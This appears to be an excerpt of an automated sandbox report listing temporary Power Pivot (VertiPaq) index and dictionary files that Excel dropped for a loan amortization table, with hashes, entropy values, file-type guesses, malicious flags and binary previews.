                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):88
                                                                                                Entropy (8bit):1.1923912884493169
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:CllQlllnl/bwl/flm0l/:mGvl/UHl/
                                                                                                MD5:E2027D7BCD47B95A5B0A4B44AF2F9ABF
                                                                                                SHA1:D4C8A76FC206FBEC1DBF7211AC353F97B6C7DF9B
                                                                                                SHA-256:05AE6EEA68D171B03567AB66974BAFE9488AF7CBEBC29B839EF8574D4DAD72A9
                                                                                                SHA-512:9C184146766549E8C75C5948E7810629494A71CF4AF1CABC80D42FC2CEABE60EA191A35FCE921FFFC47A23969E5DCC165995F0D63D79A3AD10C1BBB48EB4DC66
                                                                                                Malicious:false
                                                                                                Preview:........................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Payment Date (Month Index).POS_TO_ID.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):88
                                                                                                Entropy (8bit):1.2151185611765896
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Cll9l/bwl/W0l/6lllfl:mvl/UFl/O
                                                                                                MD5:AA82803A7811B574AD48BC1387804347
                                                                                                SHA1:751612B5A90233F1ABE89C76B41ABAB4B9DB4C05
                                                                                                SHA-256:ACD44F1B5168A053D77CC0F9C00847EC17ECACDFBEDBED7FACE4578ED164B3E7
                                                                                                SHA-512:F5D823D977C43B59C1071CEE8C678A39E775BE9ABDDFB0F75A569A4C67F7380205CB2C5A494683AD795F2C82B8B6BB8A3391E2327096E33E7932D282AB41016F
                                                                                                Malicious:false
                                                                                                Preview:........................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Payment Date (Month).ID_TO_POS.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):88
                                                                                                Entropy (8bit):1.1923912884493169
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:CllQlllnl/bwl/flm0l/:mGvl/UHl/
                                                                                                MD5:E2027D7BCD47B95A5B0A4B44AF2F9ABF
                                                                                                SHA1:D4C8A76FC206FBEC1DBF7211AC353F97B6C7DF9B
                                                                                                SHA-256:05AE6EEA68D171B03567AB66974BAFE9488AF7CBEBC29B839EF8574D4DAD72A9
                                                                                                SHA-512:9C184146766549E8C75C5948E7810629494A71CF4AF1CABC80D42FC2CEABE60EA191A35FCE921FFFC47A23969E5DCC165995F0D63D79A3AD10C1BBB48EB4DC66
                                                                                                Malicious:false
                                                                                                Preview:........................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Payment Date (Month).POS_TO_ID.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):88
                                                                                                Entropy (8bit):1.2151185611765896
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Cll9l/bwl/W0l/6lllfl:mvl/UFl/O
                                                                                                MD5:AA82803A7811B574AD48BC1387804347
                                                                                                SHA1:751612B5A90233F1ABE89C76B41ABAB4B9DB4C05
                                                                                                SHA-256:ACD44F1B5168A053D77CC0F9C00847EC17ECACDFBEDBED7FACE4578ED164B3E7
                                                                                                SHA-512:F5D823D977C43B59C1071CEE8C678A39E775BE9ABDDFB0F75A569A4C67F7380205CB2C5A494683AD795F2C82B8B6BB8A3391E2327096E33E7932D282AB41016F
                                                                                                Malicious:false
                                                                                                Preview:........................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Payment Date (Quarter).ID_TO_POS.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):56
                                                                                                Entropy (8bit):0.6967690383301713
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:illVl2lll:J
                                                                                                MD5:15E78173F01C5B2926C78101DCD8D3E5
                                                                                                SHA1:9F05C32925F21E5ED26BA4AC251701851B580FDD
                                                                                                SHA-256:D222B4E16E77D5148E41E38985ABBE76544662E78884AA227D813D7001509AD9
                                                                                                SHA-512:57145E6A09155A976F89F6B2BCA6EC1B85EEAF3AFFAF63FAE1ABF133F46E1DBBEE40AA2AE201C66FDEF3C05E07676852660C591462ED941E89DA84560B95A447
                                                                                                Malicious:false
                                                                                                Preview:........................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Payment Date (Quarter).POS_TO_ID.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):56
                                                                                                Entropy (8bit):0.732483324044457
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:El/bX1l:El/
                                                                                                MD5:713EC13803098F56C6257C556C095B19
                                                                                                SHA1:B39BB9248929D446E636BCD1D5732679753DFBA3
                                                                                                SHA-256:3AA55497E40B1B2100858C297FCFBDB593869A00DB2F0A6DA59B1234D06E40FE
                                                                                                SHA-512:2DB726CB2EEAE0A20E6CF9D77D9E7762FF3D74C3EB7B6E6C2DBEB0701B450A9DC96314A9DB79E054CCF1DD193D5ED10ECFE0D0E8F9521C677EB5E324A7BBC773
                                                                                                Malicious:false
                                                                                                Preview:........................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Payment Date (Year).ID_TO_POS.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):80
                                                                                                Entropy (8bit):1.1915783978789778
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:LEl2lllnl/bwl/Plm/l:oCvl/U
                                                                                                MD5:86EEF82473CDF3908A7992030C949863
                                                                                                SHA1:C7DE91D4369B13F62346D6E95331A318AF6D86CE
                                                                                                SHA-256:DA4BBE4931263AF07206B0C2064DDBF8A4C93CAE1561442CB3302C433E210D8A
                                                                                                SHA-512:B41ECDD5BEF1E07987279BD84F4DFA583945AE412CB7441643B04C425D1FDFFEBFE23D9E7CBA36BB584752B08C6D507465176BC58AE742BA4FAD532846EA7E4D
                                                                                                Malicious:false
                                                                                                Preview:................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Payment Date (Year).POS_TO_ID.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):80
                                                                                                Entropy (8bit):1.2165783978789777
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:LRl8l/bwl/W0l/Dl:tGl/UFl/
                                                                                                MD5:5346CEB0CFFF1598AEB2C702E656FA5E
                                                                                                SHA1:556E71E50313B0C5D787A7904D4BDA359974E5CE
                                                                                                SHA-256:9059B400ABCE3594C93EA10D447D77E3309DD5D9205FA5B921C27E0FE0D608A5
                                                                                                SHA-512:D89EBC9BFA28CD74F42E68BC15CF5D3304542B865180A3D5B33F7D4FB42B0E2646B90189C07C648D566818CB7A6C64ABCF3CECD32E72297372718853539F9775
                                                                                                Malicious:false
                                                                                                Preview:................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Payment Date.POS_TO_ID.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):3.728300500619369
                                                                                                Encrypted:false
                                                                                                SSDEEP:6:Itl/HtmZl1qY/qfS7K0l6d0DQNa97S7UtmioJBFD6Olv/6PWcp/g/cTdoJ:IIlb/qMKcW0DQNawXjQO1/6lRW
                                                                                                MD5:C3E860CC5ED6B7141170415C695910DB
                                                                                                SHA1:678C26AA2F550939212B294DA4502BF14457AE0A
                                                                                                SHA-256:8DE30C3FCBB118F9A83CAC4B89B47F1908775611D31A43D0D542B15158F7A315
                                                                                                SHA-512:CA5E9B9C164B34AC18F07B5CB105ABEFE22BE01A182B25CC89E9BEA5987A2AAF124645211CF8BA2F5106088DFE7CB6DCFB886C6E2F47FD48755BCEAE7D5FC89D
                                                                                                Malicious:false
                                                                                                Preview:=..........."...A...]...|.......................3...R...p.......................&...D...c...........................7...V...t.......................,...J...i...........................>...]...{.......................1...O...n.......................%...D...c...........................7...U...t.......................)...H...f...........................=...Z...y.......................0...O...m.......................#...A...`...........................4...S...q.......................)...G...............................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Payment Date.hidx

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:DOS executable (block device driver)
                                                                                                Category:dropped
                                                                                                Size (bytes):2237
                                                                                                Entropy (8bit):1.9031342069738209
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:aW7FSZipg43qMcpIIzH6nHt10TcDe3aYX2wAenk:JsipgqqZ2iH6n70TcOLnk
                                                                                                MD5:CBAE72A2AB2ABD7087AEEE523C373822
                                                                                                SHA1:D359978D6AF5B786712D20E980B8CAC024EC98DB
                                                                                                SHA-256:16F9593E144E40539E8B901BA08BE2EC234BFFA93FEBD5F1496FFC4C11023FEA
                                                                                                SHA-512:F63E9510FD2C91923E57AC1BF83393E48EAF5EB7D152A34C5A0B3FDBAB02F39F228A9F19BA58D1A05A3F682C2217904E0585CAA8B6A198C97948942BEA0A7C29
                                                                                                Malicious:true
                                                                                                Preview:........@....... .......y................y....... ....... .......y...............................................................................................................................U...F.......J.......\...........................................D...=...........................................................|...........0.......K...................................................,...#.......B...y...X...................................................O...5.......9...)...w...................................>...,.......T.......n.......s...........................7...........j...........................................................&...........(.......a...4...o...............................................P...#...f.......................................C...t...G.......Y.......]...................................J...$.......:...c...>.......L.......................................1.......?...G...x............................................... ...n...6..........................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Payment.ID_TO_POS.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):0.47139332164824843
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:/lflflEl8l:i0
                                                                                                MD5:E50F66EAA990B18FE1096C68AF425EAC
                                                                                                SHA1:5B83037444A2B5D419734EEE0E0BA11BB9A93672
                                                                                                SHA-256:56999AD2BCB95DD48CD2BB800E462DA9A0CEEF40F784D4F70632137C23968A83
                                                                                                SHA-512:30163B5545FE60524D15606FB759D670B13292B5CA052EA96F14575A39CB437FF5A55C3FB6596A084FC215A0BE370DFDC4E4B07A8E5C98686DF6CD87F452E4F8
                                                                                                Malicious:false
                                                                                                Preview:................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Payment.POS_TO_ID.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):64
                                                                                                Entropy (8bit):0.5456884388695526
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:/lCllll0l:wlK
                                                                                                MD5:FAF0BF043126327E6D85977CC53A3B8E
                                                                                                SHA1:3A583A7DA32A499D92CA8794D76590E34E02124E
                                                                                                SHA-256:7C64021047398A8DED4AFD6DBEACBACC9EBE2948C1AC715098193858DE1E56C9
                                                                                                SHA-512:53A22FC8F48BC0010E186032A653A6CC2C56651D791EB17DCB40C70E0D6436A314F9C0C1DC0BF4E2B852DC1B6F18665825558A8F2FDCEC4F7E543474D1EA41D0
                                                                                                Malicious:false
                                                                                                Preview:................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Pmt No.ID_TO_POS.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4237157105943106
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IM8bKH9l/cwl/c7l/8ul/Il/dl/1cl/bScl/9cl/La0:IWHfcwyJ8u+df0ucn0L
                                                                                                MD5:571520B8933266ACC5616F6EDE7AAA84
                                                                                                SHA1:E53EFA133197B6593130E83FA68CF86AE4E6C35E
                                                                                                SHA-256:ADC1DEA39C10E3C8E7333E22923C6F7082B4F34FE2397E89A2FC5DEA544F1E52
                                                                                                SHA-512:3691617EEE0B5150EC93DCEBF0BF8583EF95934D05B3ABDE6C6CC5DE6CC709F1B4496BD90A7CC3802C99AF2BAED3082ADB24349FE97CD730D69FC50F2C7CC1E0
                                                                                                Malicious:false
                                                                                                Preview:=...........y...........!...,...7...B...M...X...c...n....................................... ..."...#...$...%...&...'...(...)...*...+...-......./...0...1...2...3...4...5...6...8...9...:...;...<...=...>...?...@...A...C...D...E...F...G...H...I...J...K...L...N...O...P...Q...R...S...T...U...V...W...Y...Z...[...\...]...^..._...`...a...b...d...e...f...g...h...i...j...k...l...m...o...p...q...r...s...t...u...v...w...x...........................................................................................................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Pmt No.POS_TO_ID.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4275618644404644
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IIl/IUcl/Kol/c5l/cql/5cl/UHcl/XGl/c3t1l/c:IYIUcUoyzcqj0UHcNCc3t1y
                                                                                                MD5:5DA62D27FC5F495820AF47A4FEF51FA9
                                                                                                SHA1:4030CEA924DA363F981004FE5AEC324CDB0ED3D9
                                                                                                SHA-256:3652A6045C130892EC90FEBD53C35ED2616CD182AAFF79805B806E9DD935F2F0
                                                                                                SHA-512:8F5D008634B8C78DDAE6AC32938309275770789659AF20BB4468EDACBB67CCB32D8B16B6A920706C2A78EF3B963FFA3684CFD91014AC5FAFD6C6B6B656226D67
                                                                                                Malicious:false
                                                                                                Preview:=.......{...........f...g...h...i...j...k...l...m...n...o.......p...q...r...s...t...u...v...w...x...y.......z............................................................................... ...!..."...#...$...%...&...'...(...).......*...+...,...-......./...0...1...2...3.......4...5...6...7...8...9...:...;...<...=.......>...?...@...A...B...C...D...E...F...G.......H...I...J...K...L...M...N...O...P...Q.......R...S...T...U...V...W...X...Y...Z...[.......\...]...^..._...`...a...b...c...d...e...............................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Principal.ID_TO_POS.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4237157105943106
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:IMEcl/8cl/c8l/ccl/ccl/8cl/c8l/ccl/ccl/8a:If08cyUccy08cyUccy08
                                                                                                MD5:CB3A01F78584573B69FBC4DC4AA17C62
                                                                                                SHA1:E6A371E72572D856467A444A7464B1C0B0A52621
                                                                                                SHA-256:609DF23B7486D091206A0C150E93D1F5E00AD0CDB4CF5D81BC65B57535D48EA2
                                                                                                SHA-512:49F6CFDD28625920EFC8B217AC52E0C0B808EDC33C9DFA7DE15DFFDC823B0859A79D464C1634D2677155230D153DB39B96ECE85D98F7E92887C09244B573C539
                                                                                                Malicious:false
                                                                                                Preview:=...........y................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...............w...x...........

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\0.H$Loan$Principal.POS_TO_ID.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):520
                                                                                                Entropy (8bit):2.4275618644404644
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:I8cl/8cl/c8l/ccl/ccl/8cl/c8l/ccl/ccl/8cl/:I808cyUccy08cyUccy08c
                                                                                                MD5:359677CFC849EF85E383AE298F89AEC7
                                                                                                SHA1:AFC22980B005AF44CEE75E0624E71DD76324168A
                                                                                                SHA-256:983AD0AFECC0DE93857A6B691757C12A410D9AFCD7F0C49470FDAD9A66FF1DA3
                                                                                                SHA-512:053C3037F127D13D555FA3F426BBA952F5FDB54501D138081F1BAC3CF20262F39657E9DD312DABAA86201B49116E824A91ADA6452B3FC81CF1BF58496C610166
                                                                                                Malicious:false
                                                                                                Preview:=.......{....................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...............................

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Beginning Balance.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=492x0
                                                                                                Category:dropped
                                                                                                Size (bytes):256
                                                                                                Entropy (8bit):3.9263495708028957
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RlE1Lldtz4T/7Wk53gvyJI9aFmMhOh510PS6wj0qujt/n:bjTjW+3gvyJWWnhOhr3Hwquj1n
                                                                                                MD5:7510B601C57906C211DBF3E592F4A787
                                                                                                SHA1:543FBA4A73E18D4EE3F105584A24BFE7A16CF69D
                                                                                                SHA-256:7E2D121942AF0A439A82AE3E72B1A174F958E9FDA83EF24823DF9818A233C844
                                                                                                SHA-512:78C6405884F362B893CF85AD1A42C3D3D4857FFD1B27BA29D08473B09241224D0272D2BD20D3B8D249F914C46F9157837CC30D7F5F9D38C4585B0C580198117D
                                                                                                Malicious:false
                                                                                                Preview:............x...{.................................................................................................................................`@(......p< ....b.`2..N....D#...J.V,-.....h5......z>?`P8$..G.r.l:.PQ.Z.^.Y.-.....bcr.|F..k......tu.......

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Beginning Balance.dictionary

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377y, sparse, rows 1, columns 8, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):3459
                                                                                                Entropy (8bit):2.748266022452727
                                                                                                Encrypted:false
                                                                                                SSDEEP:48:/4rdI5gxjUt037QYWR8NxW9wVYjrar7ey7Bmeb7jz8QSLes851nqceBphDh:CI5AC0DWsGdy7B/jIes0qLBTh
                                                                                                MD5:A5936F0CC5D99182DF8FEE49A58E780B
                                                                                                SHA1:23399CF6C95DB21AB274AD9D4B3368A2E750B4EE
                                                                                                SHA-256:B6A3DDB3FAC874D9B239856B8A4B4A9833503896B85D9159F0FBC4E9E06B2EDB
                                                                                                SHA-512:7EFD318AD3F50160DB30BDCDAB62E40DA9F68AC17816C627928219A9F685968AF9146F9F91EC447FAB91695817100AD178A217E65F6E734625B624BD32224E44
                                                                                                Malicious:false
                                                                                                Preview:............@...............y.........................................y...........................@.......$.1.0.,.0.0.0...0.0...$.9.,.9.3.7...3.1...$.9.,.8.7.4...3.3...$.9.,.8.1.1...0.6...$.9.,.7.4.7...5.0...$.9.,.6.8.3...6.5...$.9.,.6.1.9...5.1...$.9.,.5.5.5...0.7...$.9.,.4.9.0...3.4...$.9.,.4.2.5...3.1...$.9.,.3.5.9...9.8...$.9.,.2.9.4...3.5...$.9.,.2.2.8...4.3...$.9.,.1.6.2...2.0...$.9.,.0.9.5...6.7...$.9.,.0.2.8...8.3...$.8.,.9.6.1...6.8...$.8.,.8.9.4...2.3...$.8.,.8.2.6...4.7...$.8.,.7.5.8...4.0...$.8.,.6.9.0...0.1...$.8.,.6.2.1...3.2...$.8.,.5.5.2...3.1...$.8.,.4.8.2...9.8...$.8.,.4.1.3...3.3...$.8.,.3.4.3...3.7...$.8.,.2.7.3...0.8...$.8.,.2.0.2...4.7...$.8.,.1.3.1...5.4...$.8.,.0.6.0...2.8...$.7.,.9.8.8...7.0...$.7.,.9.1.6...7.9...$.7.,.8.4.4...5.5...$.7.,.7.7.1...9.8...$.7.,.6.9.9...0.7...$.7.,.6.2.5...8.3...$.7.,.5.5.2...2.6...$.7.,.4.7.8...3.5...$.7.,.4.0.4...1.0...$.7.,.3.2.9...5.1...$.7.,.2.5.4...5.7...$.7.,.1.7.9...3.0...$.7.,.1.0.3...6.8...$.7.,.0.2.7...7.1...$.6.,.9.5.1

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Ending Balance.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=492x0
                                                                                                Category:dropped
                                                                                                Size (bytes):256
                                                                                                Entropy (8bit):3.9263495708028957
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RlE1Lldtz4T/7Wk53gvyJI9aFmMhOh510PS6wj0qujt/n:bjTjW+3gvyJWWnhOhr3Hwquj1n
                                                                                                MD5:7510B601C57906C211DBF3E592F4A787
                                                                                                SHA1:543FBA4A73E18D4EE3F105584A24BFE7A16CF69D
                                                                                                SHA-256:7E2D121942AF0A439A82AE3E72B1A174F958E9FDA83EF24823DF9818A233C844
                                                                                                SHA-512:78C6405884F362B893CF85AD1A42C3D3D4857FFD1B27BA29D08473B09241224D0272D2BD20D3B8D249F914C46F9157837CC30D7F5F9D38C4585B0C580198117D
                                                                                                Malicious:false
                                                                                                Preview:............x...{.................................................................................................................................`@(......p< ....b.`2..N....D#...J.V,-.....h5......z>?`P8$..G.r.l:.PQ.Z.^.Y.-.....bcr.|F..k......tu.......

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Ending Balance.dictionary

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Matlab v4 mat-file (little endian) \377\377\377\377\377\377\377\377y, text, rows 4294967295, columns 16, imaginary
                                                                                                Category:dropped
                                                                                                Size (bytes):1008
                                                                                                Entropy (8bit):7.16249840036433
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:wiskp/K7rlPVPSJ1FUl0lY1gCPx/4kYuVgl:QhVPSzFUl0lAg8J4kBVE
                                                                                                MD5:EF4B56867EB9CAB291D0FA17E46EAC77
                                                                                                SHA1:AC2E3954A31523078B18A474A4EAB632014AEA17
                                                                                                SHA-256:16A3C3EABB58673F63079FC2B8331B8155B65856A8C5BA8ED99E00DE37DDE3EE
                                                                                                SHA-512:FCDE0258B8157D44AECD4A33F8A8184002206CFD0F22B1AEB518FE25904422382BA4D3722CDBD99BBD01060288D2917A95E564ECB7E1938493FD1A3A16CC6BF5
                                                                                                Malicious:false
                                                                                                Preview:............@...............y...........;(.M.h.@.Z..)I.@..f.).@.x....@.......@".....@n.;...@<C..+..@...e.h.@.....G.@...^-'.@...6..@F<zW...@.#`"...@>n..i..@^.Rq..@....._.@z.o/<=.@..~.3..@.8.....@(.h....@DWU+'..@(.(}..@...y.n.@.A..K.@.W6X.(.@.)..<..@B.....@....H|.@..q..4.@.?.0..@..|~...@.x...[.@.n.n...@.L.G..@...2B..@.gw.X6.@o.G...@./6f...@G7...V.@.s..K..@^.1..@u..).s.@eC.Gd'.@.....@..Jx...@.l..V@.@...1..@t..v...@9...V.@.\..K..@p..."..@...3.h.@..-...@`0.ly.@.....w.@.....&.@.xxt..@..,s..@.p...1.@.c.K,.@...CO..@.....9.@:M..q.@..n.o..@._'i.=.@..t.B.@b.'....@j...=.@..V-..@T...<..@R.L.:.@t@..[.@Vk.P..@..-..3.@n0.|..@tC@T..@..`..).@0.\J(..@...S6.@...:q7.@$.....@|..i.@l.nk%..@....\.@.=....@L..HJ.@......@p..~"s.@..y...@.......@...:r;.@..z|.@T;.-...@.4.....@t=:.O:.@.....w.@D.o..@|.NC(.@.a...*.@. ...@(....;.@p.-0...@8..._..@....@H.K@..@....aZ.@@]..T..@....h&.@.U.....@......@..d....@....O.@ ......@.a....@.b....z@@..?.)t@.w.j8.j@.....[@........

                                                                                                C:\Users\user\AppData\Local\Temp\{1B72D692-6683-4BD3-9EE8-3E65BEE85389}\VertiPaq_194AA309A092464F9849\AC9B31E14A1143968EE2\DFBDBBA8B49E4AFD9EB7.0.db\Loan.0.dim\21.Loan.Interest.0.idf

                                                                                                Download File
                                                                                                Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                File Type:Sony PlayStation PSX image, 4-Bit, Pixel at (120,0) Size=492x0
                                                                                                Category:dropped
                                                                                                Size (bytes):256
                                                                                                Entropy (8bit):3.9263495708028957
                                                                                                Encrypted:false
                                                                                                SSDEEP:3:Fll/RlE1Lldtz4T/7Wk53gvyJI9aFmMhOh510PS6wj0qujt/n:bjTjW+3gvyJWWnhOhr3Hwquj1n
